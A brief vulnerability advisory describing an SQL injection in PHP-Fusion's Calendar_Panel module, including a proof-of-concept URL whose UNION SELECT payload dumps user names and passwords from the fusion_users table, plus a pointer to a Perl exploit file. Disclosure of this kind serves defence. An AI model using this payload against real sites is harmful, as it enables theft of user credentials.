PHP-Fusion Calendar_Panel Module Show_Event.PHP SQL Injection Vulnerability

PHP-Fusion Calendar_Panel Module Show_Event.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof of concept and exploit code are available:

http://www.example.com/script/infusions/calendar_panel/show_event.php?m_month=-1/**/UNI
ON/**/SELECT/**/0,1,user_password,user_name,4,5,6,7,8,9,10,11/**/FROM/**/fusion_u
sers/*

/data/vulnerabilities/exploits/23225.pl